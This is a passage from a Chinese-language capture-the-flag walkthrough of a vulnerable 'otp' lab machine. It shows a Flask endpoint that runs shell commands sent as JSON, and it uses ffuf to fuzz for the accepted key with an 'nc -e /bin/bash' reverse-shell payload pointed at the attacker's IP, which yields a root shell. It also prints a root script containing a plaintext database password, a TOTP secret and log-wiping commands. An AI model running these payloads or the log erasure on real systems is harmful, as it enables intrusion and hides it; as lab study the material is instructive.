200) [Size: 1216]<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl http:\/\/$IP:1234\/SourceCode \nZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbiwgVGltZW91dEV4cGlyZWQsIFBJUEUKZnJvbSBmbGFzayBpbXBvcnQgRmxhc2ssIGpzb25pZnksIGFib3J0LCByZXF1ZXN0CgphcHAgPSBGbGFzayhfX25hbWVfXykKCkBhcHAucm91dGUoIi8iLCBtZXRob2RzPVsiIl0pCmRlZiBpbmRleCgpOgogICAgcmVxX2pzb24gPSByZXF1ZXN0LmdldF9qc29uKCkKICAgIGlmIHJlcV9qc29uIGlzIE5vbmUgb3IgIiIgbm90IGluIHJlcV9qc29uOgogICAgICAgIGFib3J0KDQwMCwgZGVzY3JpcHRpb249IlBsZWFzZSBwcm92aWRlIGNvbW1hbmQgaW4gSlNPTiByZXF1ZXN0ISIpCiAgICBwcm9jID0gUG9wZW4ocmVxX2pzb25bIiJdLCBzdGRvdXQ9UElQRSwgc3RkZXJyPVBJUEUsIHNoZWxsPVRydWUpCiAgICB0cnk6CiAgICAgICAgb3V0cywgZXJycyA9IHByb2MuY29tbXVuaWNhdGUodGltZW91dD0xKQogICAgZXhjZXB0IFRpbWVvdXRFeHBpcmVkOgogICAgICAgIHByb2Mua2lsbCgpCiAgICAgICAgYWJvcnQoNTAwLCBkZXNjcmlwdGlvbj0iVGhlIHRpbWVvdXQgaXMgZXhwaXJlZCEiKQogICAgaWYgZXJyczoKICAgICAgICBhYm9ydCg1MDAsIGRlc2NyaXB0aW9uPWVycnMuZGVjb2RlKCd1dGYtOCcpKQogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1UcnVlLCBtZXNzYWdlPW91dHMuZGVjb2RlKCd1dGYtOCcpKQoKQGFwcC5lcnJvcmhhbmRsZXIoNDAwKQpkZWYgYmFkX3JlcXVlc3QoZXJyb3IpOgogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1GYWxzZSwgbWVzc2FnZT1lcnJvci5kZXNjcmlwdGlvbiksIDQwMAoKQGFwcC5lcnJvcmhhbmRsZXIoNTAwKQpkZWYgc2VydmVyX2Vycm9yKGVycm9yKToKICAgIHJldHVybiBqc29uaWZ5KHN1Y2Nlc3M9RmFsc2UsIG1lc3NhZ2U9ZXJyb3IuZGVzY3JpcHRpb24pICwgNTAw \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -s http:\/\/$IP:1234\/SourceCode | base64 -d \nfrom subprocess import Popen, TimeoutExpired, PIPE\nfrom flask import Flask, jsonify, abort, request\n\napp = Flask(__name__)\n\n@app.route("\/", methods=[""])\ndef index():\n req_json = request.get_json()\n if req_json is None or "" not in req_json:\n abort(400, description="Please provide command in JSON request!")\n proc = Popen(req_json[""], stdout=PIPE, stderr=PIPE, shell=True)\n try:\n outs, errs = proc.communicate(timeout=1)\n except TimeoutExpired:\n proc.kill()\n abort(500, description="The timeout is expired!")\n if errs:\n abort(500, description=errs.decode('utf-8'))\n return jsonify(success=True, message=outs.decode('utf-8'))\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify(success=False, message=error.description), 400\n\n@app.errorhandler(500)\ndef server_error(error):\n return jsonify(success=False, message=error.description) , 500 <\/code><\/pre>\nFUZZ<\/h3>\n
\u8bf4\u660e\u53ef\u4ee5\u63d0\u4ea4json<\/code>\u6267\u884c\u547d\u4ee4\uff0c\u5c1d\u8bd5\u8bbe\u7acb\u76d1\u542c\u7136\u540efuzz\u4e00\u4e0b\uff0c\u7528\u524d\u9762\u7684\u76ee\u5f55\u4f5c\u4e3a\u5b57\u5178\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n\u989d\uff0c\u5230\u8fd9\u91cc\u6211\u865a\u62df\u673a\u5c45\u7136\u6b7b\u673a\u4e86\u3002\u3002\u3002\u3002\u3002\u91cd\u542f\u4ee5\u540e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ echo "Adroit\\nAgain\\nAlzheimer\\nAttack\\nBah\\nBaseME\\nBeloved\\nBlackWidow\\nBrain\\nBreakout\\nBroken\\nBunny\\nCelebritySoup\\nCeres\\nChoc\\nChronos\\nClover\\nCondor\\nConfusion\\nConnection\\nController\\nCrossroads\\nDance\\nDeba\\nDemons\\nDevguru\\nDiophante\\nDoc\\nDominator\\nDoubletrouble\\nDriftingblues3\\nDriftingblues5\\nDriftingblues6\\nDriftingblues7\\nDriftingblues8\\nDriftingblues9\\nDrippingblues\\nEchoed\\nEighty\\nEmma\\nEyes\\nFamily\\nFamily2\\nFaust\\nFive\\nFlower\\nForbidden\\nGift\\nGigachad\\nGinger\\nGovernment\\nGrotesque\\nGrotesque2\\nGrotesque3\\nHacked\\nHash\\nHat\\nHelium\\nHidden\\nHomage\\nHommie\\nHopper\\nHundred\\nIcarus\\nInsomnia\\nIsengard\\nKeys\\nKlim\\nLearn2Code\\nLevel\\nLight\\nLisa\\nListen\\nLocker\\nLupinone\\nMay\\nMemories\\nMessedUP\\nMethod\\nMilk\\nMomentum\\nMomentum2\\nMoosage\\nNarcos\\nNeobank\\nNightfall\\nNoob\\nNowords\\nNumber\\nOrasi\\nOtte\\nPickle\\nPwned\\nRandom\\nRipper\\nRubies\\nSatori\\nSedem\\nServe\\nShop\\nSoul\\nSpeed\\nStagiaire\\nStars\\nsuidy\\nSuidyRevenge\\nSuperhuman\\nSuuk\\nSysadmin\\nT800\\nTalk\\nTaurus\\nTexte\\nTheFool\\nTitan\\nTom\\nTornado\\nTranquil\\nTron\\nTroya\\nTwisted\\nUnbakedPie\\nVideoclub\\nVisions\\nVulny\\nWarez\\nWebmaster\\nWinter\\nZday\\nZen" > ff\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP:1234 -X PUT -H 'Content-Type: application\/json' -d '{"FUZZ": "nc -e \/bin\/bash 192.168.0.143 2345"}' -w .\/ff\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : PUT\n :: URL : http:\/\/:1234\n :: Wordlist : FUZZ: \/home\/kali\/temp\/otp\/ff\n :: Header : Content-Type: application\/json\n :: Data : {"FUZZ": "nc -e \/bin\/bash 192.168.0.143 2345"}\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n:: Progress: [130\/130] :: Job [1\/1] :: 0 req\/sec :: Duration: [0:00:00] :: Errors: 130 ::<\/code><\/pre>\n\u548b\u6ca1\u6210\u529f\uff0c\u770b\u4e00\u4e0b\u662f\u4e0d\u662f\u54ea\u51fa\u9519\u4e86\u3002\u3002\u3002\u3002\u91cd\u542f\u4ee5\u540eIP\u6ca1\u6709\u8bbe\u7f6e\u3002\u3002\u3002\u3002\u8fd9\u4e2a\u662f\u4e34\u65f6\u7684\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/192.168.0.107:1234 -X PUT -H 'Content-Type: application\/json' -d '{"FUZZ": "nc -e \/bin\/bash 192.168.0.143 2345"}' -w .\/ff\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : PUT\n :: URL : http:\/\/192.168.0.107:1234\n :: Wordlist : FUZZ: \/home\/kali\/temp\/otp\/ff\n :: Header : Content-Type: application\/json\n :: Data : {"FUZZ": "nc -e \/bin\/bash 192.168.0.143 2345"}\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\nVisions [Status: 500, Size: 54, Words: 4, Lines: 2, Duration: 1161ms]\n:: Progress: [130\/130] :: Job [1\/1] :: 83 req\/sec :: Duration: [0:00:01] :: Errors: 0 ::<\/code><\/pre>\n\u53d1\u73b0shell\u5df2\u7ecf\u5f39\u8fc7\u6765\u4e86\uff01<\/p>\n
<\/div><\/p>\n(remote) root@otp:\/root# ls -la\ntotal 40\ndrwx------ 3 root root 4096 Jul 12 05:01 .\ndrwxr-xr-x 18 root root 4096 Nov 17 2021 ..\n-r-------- 1 root root 2307 Nov 22 2021 app.py\nlrwxrwxrwx 1 root root 9 Nov 22 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 3526 Nov 17 2021 .bashrc\n-rwx------ 1 david david 61 Nov 23 2021 .chmod\n-rwx------ 1 root root 33 Nov 22 2021 flag_r00t.txt\n---x------ 1 root root 56 Nov 22 2021 localhost.sh\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\ndrwxr-xr-x 2 root root 4096 Jul 12 05:01 __pycache__\n-rwxr-xr-x 1 root root 354 Nov 23 2021 update.sh\n(remote) root@otp:\/root# cat flag_r00t.txt \n8a2d55707a9084982649dadc04b426a0\n(remote) root@otp:\/root# cat update.sh \n#!\/bin\/bash\n\nwhile :\ndo\n \/usr\/bin\/mysql -u hacker -p'#4ck!ng!s!nMybl0od' -D otp -e "UPDATE creds SET totp = $(oathtool --totp -b NYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK) WHERE id=2"\n\n \/usr\/bin\/echo " " >\/var\/log\/auth.log\n \/usr\/bin\/echo " " >\/var\/log\/vsftpd.log\n \/usr\/bin\/echo " " >\/var\/log\/apache2\/access.log\n \/usr\/bin\/echo " " >\/var\/log\/apache2\/error.log\ndone\n(remote) root@otp:\/root# cat localhost.sh \n#!\/bin\/bash\n\ncd \/root\/ && \/usr\/bin\/python3 -m flask run\n(remote) root@otp:\/root# cat .chmod \n#!\/bin\/bash\n\n\/usr\/bin\/chmod 777 \/var\/www\/otp\/argon\/u9l04d_\/*\n(remote) root@otp:\/root# cat app.py \n# https:\/\/stackoverflow.com\/questions\/57104398\/python-flask-how-to-run-subprocess-pass-a-command\/57104633#57104633\nfrom subprocess import Popen, TimeoutExpired, PIPE\nfrom flask import Flask, jsonify, abort, request\n\napp = Flask(__name__)\n\n@app.route("\/", methods=["PUT"])\ndef index():\n req_json = request.get_json()\n if req_json is None or "Visions" not in req_json:\n abort(400, description="Provide command in JSON request!")\n proc = Popen(req_json["Visions"], stdout=PIPE, stderr=PIPE, shell=True)\n try:\n outs, errs = proc.communicate(timeout=1)\n except TimeoutExpired:\n proc.kill()\n abort(500, description="The timeout is expired!")\n if errs:\n abort(500, description=errs.decode('utf-8'))\n return jsonify(success=True, message=outs.decode('utf-8'))\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify(success=False, message=error.description), 400\n\n@app.errorhandler(500)\ndef server_error(error):\n return jsonify(success=False, message=error.description) , 500\n\n@app.route("\/SourceCode")\ndef code():\n return "ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbiwgVGltZW91dEV4cGlyZWQsIFBJUEUKZnJvbSBmbGFzayBpbXBvcnQgRmxhc2ssIGpzb25pZnksIGFib3J0LCByZXF1ZXN0CgphcHAgPSBGbGFzayhfX25hbWVfXykKCkBhcHAucm91dGUoIi8iLCBtZXRob2RzPVsiIl0pCmRlZiBpbmRleCgpOgogICAgcmVxX2pzb24gPSByZXF1ZXN0LmdldF9qc29uKCkKICAgIGlmIHJlcV9qc29uIGlzIE5vbmUgb3IgIiIgbm90IGluIHJlcV9qc29uOgogICAgICAgIGFib3J0KDQwMCwgZGVzY3JpcHRpb249IlBsZWFzZSBwcm92aWRlIGNvbW1hbmQgaW4gSlNPTiByZXF1ZXN0ISIpCiAgICBwcm9jID0gUG9wZW4ocmVxX2pzb25bIiJdLCBzdGRvdXQ9UElQRSwgc3RkZXJyPVBJUEUsIHNoZWxsPVRydWUpCiAgICB0cnk6CiAgICAgICAgb3V0cywgZXJycyA9IHByb2MuY29tbXVuaWNhdGUodGltZW91dD0xKQogICAgZXhjZXB0IFRpbWVvdXRFeHBpcmVkOgogICAgICAgIHByb2Mua2lsbCgpCiAgICAgICAgYWJvcnQoNTAwLCBkZXNjcmlwdGlvbj0iVGhlIHRpbWVvdXQgaXMgZXhwaXJlZCEiKQogICAgaWYgZXJyczoKICAgICAgICBhYm9ydCg1MDAsIGRlc2NyaXB0aW9uPWVycnMuZGVjb2RlKCd1dGYtOCcpKQogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1UcnVlLCBtZXNzYWdlPW91dHMuZGVjb2RlKCd1dGYtOCcpKQoKQGFwcC5lcnJvcmhhbmRsZXIoNDAwKQpkZWYgYmFkX3JlcXVlc3QoZXJyb3IpOgogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1GYWxzZSwgbWVzc2FnZT1lcnJvci5kZXNjcmlwdGlvbiksIDQwMAoKQGFwcC5lcnJvcmhhbmRsZXIoNTAwKQpkZWYgc2VydmVyX2Vycm9yKGVycm9yKToKICAgIHJldHVybiBqc29uaWZ5KHN1Y2Nlc3M9RmFsc2UsIG1lc3NhZ2U9ZXJyb3IuZGVzY3JpcHRpb24pICwgNTAw"<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1nx4y1U7He\/<\/a><\/p>\n
![\"image-20240712150845197\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817523.png\")
<\/div><\/p>\n![\"image-20240712152507274\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817524.png\")
<\/div>![\"image-20240712152540843\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817525.png\")
<\/div><\/p>\n![\"image-20240712152623803\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817526.png\")
<\/div><\/p>\n![\"image-20240712152708101\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817527.png\")
<\/div><\/p>\n![\"image-20240712153401732\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817528.png\")
<\/div><\/p>\n![\"image-20240712153515874\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817529.png\")
<\/div><\/p>\n![\"image-20240712153901457\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817530.png\")
<\/div><\/p>\n![\"image-20240712162423204\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817531.png\")
<\/div><\/p>\n![\"image-20240712164048501\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817532.png\")
<\/div><\/p>\n![\"image-20240712164136255\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817533.png\")
<\/div><\/p>\n![\"image-20240712164615302\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817534.png\")
<\/div><\/p>\n![\"image-20240712165635560\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817535.png\")
<\/div><\/p>\n![\"image-20240712165946835\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817536.png\")
<\/div><\/p>\n![\"image-20240712170748517\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817538.png\")
<\/div><\/p>\n![\"image-20240712181547338\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817539.png\")
<\/div><\/p>\n